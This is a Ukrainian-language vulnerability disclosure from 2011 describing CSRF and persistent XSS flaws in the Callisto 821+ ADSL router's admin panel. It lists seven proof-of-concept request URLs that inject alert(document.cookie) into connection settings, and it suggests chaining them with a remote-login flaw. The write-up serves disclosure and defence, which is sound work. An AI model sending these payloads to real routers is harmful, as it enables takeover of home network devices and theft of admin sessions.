Численні CSRF і XSS уразливості в ADSL модемі Callisto 821+
18:08 23.07.2011Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).
Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.
Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.
CSRF:
Кожен конекшен в розділі LAN connections, як дефолтний, так й інші конекшени, мають розширені налаштування. Розглянемо на прикладі дефолтного конекшена (iplan).
В розділі Edit connection в підрозділі Edit Ip Interface (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan) через CSRF можна змінювати нашалтування (IP, Mask та інші) конекшена.
В підрозділі Edit Tcp Mss Clamp (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp) через CSRF можна змінювати нашалтування конекшена.
В підрозділі Edit Rip Versions (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImRipVersions) через CSRF можна змінювати нашалтування конекшена.
В підрозділі Edit NAT (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImNatHelper) через CSRF можна змінювати нашалтування конекшена.
XSS:
В вищезгаданих чотирьох підрозділах розділа Edit connection є багато persistent XSS уразливостей.
В підрозіділі Edit Ip Interface:
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3EВ підрозділах Edit Tcp Mss Clamp, Edit Rip Versions та Edit NAT аналогічна ситуація.
А також можливі атаки через імена параметрів (коли XSS код задається в імені параметра), про що я писав раніше.
В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html.
